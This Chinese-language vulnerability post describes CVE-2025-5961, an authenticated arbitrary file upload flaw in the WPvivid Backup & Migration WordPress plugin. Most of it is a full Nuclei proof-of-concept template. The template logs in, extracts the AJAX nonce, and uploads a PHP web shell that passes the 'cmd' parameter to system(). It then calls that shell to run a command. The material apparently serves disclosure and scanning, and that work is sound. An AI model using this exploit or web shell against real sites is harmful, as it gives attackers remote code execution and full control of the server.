Migration, Backup, Staging – WPvivid Backup & Migration Authenticated Arbitrary File Upload Vulnerability

漏洞信息

漏洞名称: Migration, Backup, Staging – WPvivid Backup & Migration Authenticated Arbitrary File Upload Vulnerability

漏洞编号:

  • CVE: CVE-2025-5961

漏洞类型: 文件上传

漏洞等级: 高危

漏洞描述: 该漏洞影响WordPress的Migration, Backup, Staging – WPvivid Backup & Migration插件,版本0.9.116及以下。WPvivid Backup & Migration是一个广泛使用的WordPress插件,主要用于网站的备份、迁移和暂存功能,常见于个人博客和企业网站中。漏洞存在于插件的’wpvivid_upload_import_files’函数中,由于缺少对上传文件类型的有效验证,攻击者可以通过认证后上传任意文件,包括PHP脚本,从而导致服务器端代码执行。这种漏洞的技术根源在于开发者未能充分实施文件类型和内容的检查机制,使得攻击者可以绕过预期的安全限制。此漏洞的高危性在于它允许攻击者在获得有效用户凭证后,上传恶意脚本并执行任意代码,可能导致网站被完全控制、数据泄露或其他恶意操作。由于需要认证,漏洞的利用条件相对较高,但一旦利用成功,其影响范围广泛且后果严重。

产品厂商: WPvivid

产品名称: Migration, Backup, Staging – WPvivid Backup & Migration

影响版本: <= 0.9.116

来源: https://github.com/projectdiscovery/nuclei-templates/blob/85fb4eac356b2c05ddb5ad400db52139bf578f8a/http%2Fcves%2F2025%2FCVE-2025-5961.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81

id: CVE-2025-5961

info:
  name: Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116  - Authenticated Arbitrary File Upload
  author: pussycat0x
  severity: high
  description: |
    The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'wpvivid_upload_import_files' function in all versions up to, and including, 0.9.116
  references:
    - https://github.com/Nxploited/CVE-2025-5961
  tags: cve,cve2025,wordpress,intrusive,wpvivid,plugin,unauth,backup

variables:
  payload: '<?php echo "<br>"; if(isset($_GET["cmd"])){ echo "<pre>"; system($_GET["cmd"]); echo "</pre>"; } ?>'
  cmd: 'id'

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=wpvivid-export-import HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        Accept: */*
        Connection: keep-alive
        Content-Length: 598
        Content-Type: multipart/form-data; boundary=0b9e4b9be0f532af74af1582b95632f2

        --0b9e4b9be0f532af74af1582b95632f2
        Content-Disposition: form-data; name="action"

        wpvivid_upload_import_files
        --0b9e4b9be0f532af74af1582b95632f2
        Content-Disposition: form-data; name="_ajax_nonce"

        {{ajax_nonce}}
        --0b9e4b9be0f532af74af1582b95632f2
        Content-Disposition: form-data; name="async-upload"; filename="{{randstr}}.php"
        Content-Type: application/x-php

        {{payload}}
        --0b9e4b9be0f532af74af1582b95632f2
        Content-Disposition: form-data; name="name"

        {{randstr}}.php
        --0b9e4b9be0f532af74af1582b95632f2--

      - |
        GET wp-content/wpvividbackups/ImportandExport/{{randstr}}.php?cmd={{cmd}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(body_3, "{\"result\":\"success\"}")
          - regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body_4)
          - status_code_2 == 200 && status_code_3 == 200 && status_code_4 == 200
        condition: and

    extractors:
      - type: regex
        part: body_2
        group: 1
        internal: true
        name: ajax_nonce
        regex:
          - '"ajax_nonce":"([a-f0-9]+)"'



Github Poc
#projectdiscovery/nuclei-templates:github issues #文件上传
Migration, Backup, Staging – WPvivid Backup & Migration Authenticated Arbitrary File Upload Vulnerability
http://example.com/2025/07/17/github_49902344/
作者
lianccc
发布于
2025年7月17日
许可协议